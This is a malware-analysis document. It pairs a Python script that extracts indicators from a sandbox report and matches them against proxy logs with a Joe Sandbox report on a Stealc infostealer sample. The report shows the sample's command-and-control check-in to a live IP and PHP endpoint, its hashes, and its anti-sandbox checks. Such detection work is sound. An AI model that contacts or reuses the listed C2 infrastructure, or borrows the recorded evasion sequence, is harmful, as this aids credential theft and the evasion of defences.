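# a carved string like "http://185.215.113.206-0%Avira" would otherwise leak
# junk into the host. The path stops at the first byte that cannot be in a path.
URL_RE = re.compile(
    r"(?:https?://)?(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?![\d.])(?P<path>/[\w./-]*)?"
)
# Assumption: characters glued straight onto a script extension with no
# separator (".phps0_", ".phpk1G", ".phpfalse") are memory junk, so cut them.
SCRIPT_TAIL_RE = re.compile(r"^(?P<keep>.*?\.(?:php|aspx?|jsp|cgi))(?![/?&#]).+$")
WINDOW_RE = re.compile(r"Open window title or class name: (?P<v>.+)$")
DEVICE_RE = re.compile(r"File opened: (?P<v>\S+)$")
REG_RE = re.compile(r"Registry key queried: (?P<key>\S+) name: (?P<v>\S+)")


def normalise_url(text):
    """Return a canonical http://host/path for the first IPv4 URL in text, else None."""
    m = URL_RE.search(text)
    if not m:
        return None
    path = m.group("path") or "/"
    tail = SCRIPT_TAIL_RE.match(path)
    if tail:
        path = tail.group("keep")
    return "http://%s%s" % (m.group("host"), path)


def extract_iocs(lines):
    """Split report lines into network IOCs and the anti-analysis probes they record."""
    iocs = {"urls": set(), "ips": set(), "window_names": [], "device_names": [],
            "registry_checks": [], "rdtsc_checks": 0}
    for line in lines:
        if "RDTSC instruction interceptor" in line:
            iocs["rdtsc_checks"] += 1
        elif REG_RE.search(line):
            r = REG_RE.search(line)
            iocs["registry_checks"].append((r.group("key"), r.group("v")))
        elif WINDOW_RE.search(line):
            iocs["window_names"].append(WINDOW_RE.search(line).group("v").strip())
        elif DEVICE_RE.search(line):
            iocs["device_names"].append(DEVICE_RE.search(line).group("v"))
        else:
            url = normalise_url(line)
            if url:
                iocs["urls"].add(url)
                iocs["ips"].add(url.split("/")[2])
    iocs["urls"] = sorted(iocs["urls"])
    iocs["ips"] = sorted(iocs["ips"])
    return iocs


def match_proxy_log(log_lines, iocs):
    """Squid native log: time elapsed client code/status bytes method URL ident hier/peer type."""
    bad_urls, bad_ips = set(iocs["urls"]), set(iocs["ips"])
    hits = []
    for line in log_lines:
        f = line.split()
        if len(f) < 9:
            continue
        client, url_field, peer = f[2], f[6], f[8].rsplit("/", 1)[-1]
        url = normalise_url(url_field)
        if url in bad_urls:
            reason = "url"
        elif peer in bad_ips or (url and url.split("/")[2] in bad_ips):
            reason = "ip"
        else:
            continue
        hits.append({"client": client, "url": url or url_field, "reason": reason})
    return hits


if __name__ == "__main__":
    found = extract_iocs(SIGNATURE_LINES)
    for key, value in found.items():
        print(key, value)
    for hit in match_proxy_log(PROXY_LOG, found):
        print("HIT", hit)
```

The exact-match check deliberately ignores 185.215.113.16, even though the ASN context table on this page ties it to the same operator; a /24 or ASN pivot is a separate, noisier decision that belongs in the hunt plan rather than in the IOC matcher.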
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561767
Start date and time: 2024-11-24 08:45:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 18
• Number of non-executed functions: 122
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Context: IPs (other samples previously seen contacting the same host)

Match | Associated Sample | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                          No context
Context: ASNs (other samples previously seen in the same ASN)

Match | Associated Sample | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Amadey | 185.215.113.43
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.945527901436716 (close to the 8.0 maximum, as expected for the packed payload the Software Packing signatures report)
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'818'624 bytes
MD5: 25fa991e349149a46f237995246dcac2
SHA1: 581f619ac0a4f4f6e995e14a419b3a5d5e50bbcf
SHA256: 6a076f8ee05524ec960150149ced7df5c5953f6fe04de4fada9c5d3439552eb5
SHA512: 1f1fab8071358dc1017f89e992e76ac1ea01f75566010cd61fd1f9f1d3225f3e1a6405aa3fc37488c6ee205fd7cbdc4af4e04603f2202e80baca21e8a10fe9a2
SSDEEP: 24576:GmWo75/1/t1278AIYO5zFZpi0KoJ71oIrNyxlgFnrrQee9zT50bmji984Y3hpCcL:GmT51KYxZ40d713KgrSzTYaiBY3PTB
TLSH: 558533426381F688FBA7E7BFB2C2394A33811592642E0797FC085535F97BB419C52E36
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaa0000
Entrypoint Section: .taggant (a section written by packers that implement the IEEE taggant system, among them Oreans Themida/WinLicense, which fits the WinLicense strings found in memory; an entry point here is what the "Entry point lies outside standard sections" signature refers to)
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point: a single jmp into the protector stub, followed by bytes that are data rather than code; 00 00 decodes as add byte ptr [eax], al, which is why the listing below is mostly that instruction)
                          jmp 00007FD184E0102Ah
                          setle byte ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ebx], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00h], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [ecx], eax
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                           | 0x1000 | 0x249000 | 0x16200 | b009a15e12521b42062008886842fe9b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x24a000 | 0x2b0 | 0x200 | a4e87cd81c8411ef36a4facf8e9cdce1 | False | 0.802734375 | data | 6.036865365874904 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                           | 0x24c000 | 0x2b1000 | 0x200 | fe993a79a21b9edee6c9eb8a1276f623 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          ktlotalb | 0x4fd000 | 0x1a2000 | 0x1a2000 | 04698fd89776c7198b6b370a1c3492f4 | False | 0.9947270297547847 | data | 7.953808947357536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          fvaiddkx | 0x69f000 | 0x1000 | 0x600 | 53c4447bcea826decedadd05edbd5b07 | False | 0.5852864583333334 | data | 5.032552949115954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant | 0x6a0000 | 0x3000 | 0x2200 | 856a3efdd8bba0cc61a7fb0b21199954 | False | 0.06043198529411765 | DOS executable (COM) | 0.5803765048413185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_MANIFEST | 0x69eca4 | 0x256 | ASCII text, with CRLF line terminators |  |  | 0.5100334448160535
                          DLL | Import
                          kernel32.dll | lstrcpy
                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                          2024-11-24T08:46:06.690752+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49708 | 185.215.113.206 | 80 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Nov 24, 2024 08:46:04.763803959 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:04.883460045 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:04.883539915 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:04.887257099 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:05.006911039 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:06.231559038 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:06.231623888 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:06.237441063 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:06.356880903 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:06.690685987 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:06.690752029 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:11.695185900 CET | 80 | 49708 | 185.215.113.206 | 192.168.2.6
                          Nov 24, 2024 08:46:11.695242882 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          Nov 24, 2024 08:46:11.892369986 CET | 49708 | 80 | 192.168.2.6 | 185.215.113.206
                          • 185.215.113.206
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.6 | 49708 | 185.215.113.206 | 80 | 3992 | C:\Users\user\Desktop\file.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Nov 24, 2024 08:46:04.887257099 CET | 90 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 24, 2024 08:46:06.231559038 CET | 203 | IN | HTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 07:46:06 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 24, 2024 08:46:06.237441063 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 33 30 46 32 42 37 37 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a
                          Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="hwid"F730F2B77D8C1730677652------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="build"mars------GHJDGDBFCBKFHJKFHCBK--
                          Nov 24, 2024 08:46:06.690685987 CET | 210 | IN | HTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 07:46:06 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Target ID:0
                          Start time:02:45:59
                          Start date:24/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x6d0000
                          File size:1'818'624 bytes
                          MD5 hash:25FA991E349149A46F237995246DCAC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:4.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.3%
                            Total number of Nodes:1406
                            Total number of Limit Nodes:28
                            execution_graph 27939 6d5869 57 API calls 27970 6e1269 408 API calls 27978 6f72e9 lstrcpy lstrcat malloc strcpy_s std::exception::_Copy_str 27961 6f2d60 11 API calls 27979 6fa280 __CxxFrameHandler 27980 6f2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27940 6d8c79 malloc strcpy_s 27981 6d1b64 162 API calls 27992 6dbbf9 90 API calls 27974 6ef2f8 93 API calls 27950 6ee0f9 140 API calls 27982 6e6b79 138 API calls 27942 6e4c77 295 API calls 26502 6f1bf0 26554 6d2a90 26502->26554 26506 6f1c03 26507 6f1c29 lstrcpy 26506->26507 26508 6f1c35 26506->26508 26507->26508 26509 6f1c6d GetSystemInfo 26508->26509 26510 6f1c65 ExitProcess 26508->26510 26511 6f1c7d ExitProcess 26509->26511 26512 6f1c85 26509->26512 26655 6d1030 GetCurrentProcess VirtualAllocExNuma 26512->26655 26517 6f1cb8 26667 6f2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 26517->26667 26518 6f1ca2 26518->26517 26519 6f1cb0 ExitProcess 26518->26519 26521 6f1cbd 26522 6f1ce7 lstrlen 26521->26522 26876 6f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26521->26876 26526 6f1cff 26522->26526 26524 6f1cd1 26524->26522 26528 6f1ce0 ExitProcess 26524->26528 26525 6f1d23 lstrlen 26527 6f1d39 26525->26527 26526->26525 26529 6f1d13 lstrcpy lstrcat 26526->26529 26530 6f1d5a 26527->26530 26531 6f1d46 lstrcpy lstrcat 26527->26531 26529->26525 26532 6f2ad0 3 API calls 26530->26532 26531->26530 26533 6f1d5f lstrlen 26532->26533 26535 6f1d74 26533->26535 26534 6f1d9a lstrlen 26536 6f1db0 26534->26536 26535->26534 26537 6f1d87 lstrcpy lstrcat 26535->26537 26538 6f1dce 26536->26538 26539 6f1dba lstrcpy lstrcat 26536->26539 26537->26534 26669 6f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26538->26669 26539->26538 26541 6f1dd3 lstrlen 26542 6f1de7 26541->26542 26543 6f1df7 lstrcpy lstrcat 26542->26543 26544 6f1e0a 26542->26544 26543->26544 26545 6f1e28 lstrcpy 26544->26545 26546 6f1e30 26544->26546 26545->26546 26547 6f1e56 OpenEventA 26546->26547 26548 6f1e8c CreateEventA 
26547->26548 26549 6f1e68 CloseHandle Sleep OpenEventA 26547->26549 26670 6f1b20 GetSystemTime 26548->26670 26549->26548 26549->26549 26553 6f1ea5 CloseHandle ExitProcess 26877 6d4a60 26554->26877 26556 6d2aa1 26557 6d4a60 2 API calls 26556->26557 26558 6d2ab7 26557->26558 26559 6d4a60 2 API calls 26558->26559 26560 6d2acd 26559->26560 26561 6d4a60 2 API calls 26560->26561 26562 6d2ae3 26561->26562 26563 6d4a60 2 API calls 26562->26563 26564 6d2af9 26563->26564 26565 6d4a60 2 API calls 26564->26565 26566 6d2b0f 26565->26566 26567 6d4a60 2 API calls 26566->26567 26568 6d2b28 26567->26568 26569 6d4a60 2 API calls 26568->26569 26570 6d2b3e 26569->26570 26571 6d4a60 2 API calls 26570->26571 26572 6d2b54 26571->26572 26573 6d4a60 2 API calls 26572->26573 26574 6d2b6a 26573->26574 26575 6d4a60 2 API calls 26574->26575 26576 6d2b80 26575->26576 26577 6d4a60 2 API calls 26576->26577 26578 6d2b96 26577->26578 26579 6d4a60 2 API calls 26578->26579 26580 6d2baf 26579->26580 26581 6d4a60 2 API calls 26580->26581 26582 6d2bc5 26581->26582 26583 6d4a60 2 API calls 26582->26583 26584 6d2bdb 26583->26584 26585 6d4a60 2 API calls 26584->26585 26586 6d2bf1 26585->26586 26587 6d4a60 2 API calls 26586->26587 26588 6d2c07 26587->26588 26589 6d4a60 2 API calls 26588->26589 26590 6d2c1d 26589->26590 26591 6d4a60 2 API calls 26590->26591 26592 6d2c36 26591->26592 26593 6d4a60 2 API calls 26592->26593 26594 6d2c4c 26593->26594 26595 6d4a60 2 API calls 26594->26595 26596 6d2c62 26595->26596 26597 6d4a60 2 API calls 26596->26597 26598 6d2c78 26597->26598 26599 6d4a60 2 API calls 26598->26599 26600 6d2c8e 26599->26600 26601 6d4a60 2 API calls 26600->26601 26602 6d2ca4 26601->26602 26603 6d4a60 2 API calls 26602->26603 26604 6d2cbd 26603->26604 26605 6d4a60 2 API calls 26604->26605 26606 6d2cd3 26605->26606 26607 6d4a60 2 API calls 26606->26607 26608 6d2ce9 26607->26608 26609 6d4a60 2 API calls 26608->26609 26610 6d2cff 26609->26610 26611 6d4a60 2 API calls 26610->26611 26612 6d2d15 
26611->26612 26613 6d4a60 2 API calls 26612->26613 26614 6d2d2b 26613->26614 26615 6d4a60 2 API calls 26614->26615 26616 6d2d44 26615->26616 26617 6d4a60 2 API calls 26616->26617 26618 6d2d5a 26617->26618 26619 6d4a60 2 API calls 26618->26619 26620 6d2d70 26619->26620 26621 6d4a60 2 API calls 26620->26621 26622 6d2d86 26621->26622 26623 6d4a60 2 API calls 26622->26623 26624 6d2d9c 26623->26624 26625 6d4a60 2 API calls 26624->26625 26626 6d2db2 26625->26626 26627 6d4a60 2 API calls 26626->26627 26628 6d2dcb 26627->26628 26629 6d4a60 2 API calls 26628->26629 26630 6d2de1 26629->26630 26631 6d4a60 2 API calls 26630->26631 26632 6d2df7 26631->26632 26633 6d4a60 2 API calls 26632->26633 26634 6d2e0d 26633->26634 26635 6d4a60 2 API calls 26634->26635 26636 6d2e23 26635->26636 26637 6d4a60 2 API calls 26636->26637 26638 6d2e39 26637->26638 26639 6d4a60 2 API calls 26638->26639 26640 6d2e52 26639->26640 26641 6f6390 GetPEB 26640->26641 26642 6f65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26641->26642 26645 6f63c3 26641->26645 26643 6f6638 26642->26643 26644 6f6625 GetProcAddress 26642->26644 26646 6f666c 26643->26646 26647 6f6641 GetProcAddress GetProcAddress 26643->26647 26644->26643 26652 6f63d7 20 API calls 26645->26652 26648 6f6688 26646->26648 26649 6f6675 GetProcAddress 26646->26649 26647->26646 26650 6f66a4 26648->26650 26651 6f6691 GetProcAddress 26648->26651 26649->26648 26653 6f66ad GetProcAddress GetProcAddress 26650->26653 26654 6f66d7 26650->26654 26651->26650 26652->26642 26653->26654 26654->26506 26656 6d105e VirtualAlloc 26655->26656 26657 6d1057 ExitProcess 26655->26657 26658 6d107d 26656->26658 26659 6d108a VirtualFree 26658->26659 26660 6d10b1 26658->26660 26659->26660 26661 6d10c0 26660->26661 26662 6d10d0 GlobalMemoryStatusEx 26661->26662 26664 6d10f5 26662->26664 26665 6d1112 ExitProcess 26662->26665 26664->26665 26666 6d111a GetUserDefaultLangID 26664->26666 26666->26517 26666->26518 26668 6f2b24 26667->26668 26668->26521 
26669->26541 26882 6f1820 26670->26882 26672 6f1b81 sscanf 26921 6d2a20 26672->26921 26675 6f1be9 26678 6effd0 26675->26678 26676 6f1bd6 26676->26675 26677 6f1be2 ExitProcess 26676->26677 26679 6effe0 26678->26679 26680 6f000d lstrcpy 26679->26680 26681 6f0019 lstrlen 26679->26681 26680->26681 26682 6f00d0 26681->26682 26683 6f00db lstrcpy 26682->26683 26684 6f00e7 lstrlen 26682->26684 26683->26684 26685 6f00ff 26684->26685 26686 6f010a lstrcpy 26685->26686 26687 6f0116 lstrlen 26685->26687 26686->26687 26688 6f012e 26687->26688 26689 6f0139 lstrcpy 26688->26689 26690 6f0145 26688->26690 26689->26690 26923 6f1570 26690->26923 26693 6f016e 26694 6f018f lstrlen 26693->26694 26695 6f0183 lstrcpy 26693->26695 26696 6f01a8 26694->26696 26695->26694 26697 6f01bd lstrcpy 26696->26697 26698 6f01c9 lstrlen 26696->26698 26697->26698 26699 6f01e8 26698->26699 26700 6f020c lstrlen 26699->26700 26701 6f0200 lstrcpy 26699->26701 26702 6f026a 26700->26702 26701->26700 26703 6f0282 lstrcpy 26702->26703 26704 6f028e 26702->26704 26703->26704 26933 6d2e70 26704->26933 26712 6f0540 26713 6f1570 4 API calls 26712->26713 26714 6f054f 26713->26714 26715 6f05a1 lstrlen 26714->26715 26716 6f0599 lstrcpy 26714->26716 26717 6f05bf 26715->26717 26716->26715 26718 6f05d1 lstrcpy lstrcat 26717->26718 26719 6f05e9 26717->26719 26718->26719 26720 6f0614 26719->26720 26721 6f060c lstrcpy 26719->26721 26722 6f061b lstrlen 26720->26722 26721->26720 26723 6f0636 26722->26723 26724 6f064a lstrcpy lstrcat 26723->26724 26725 6f0662 26723->26725 26724->26725 26726 6f0687 26725->26726 26727 6f067f lstrcpy 26725->26727 26728 6f068e lstrlen 26726->26728 26727->26726 26729 6f06b3 26728->26729 26730 6f06c7 lstrcpy lstrcat 26729->26730 26731 6f06db 26729->26731 26730->26731 26732 6f0704 lstrcpy 26731->26732 26733 6f070c 26731->26733 26732->26733 26734 6f0749 lstrcpy 26733->26734 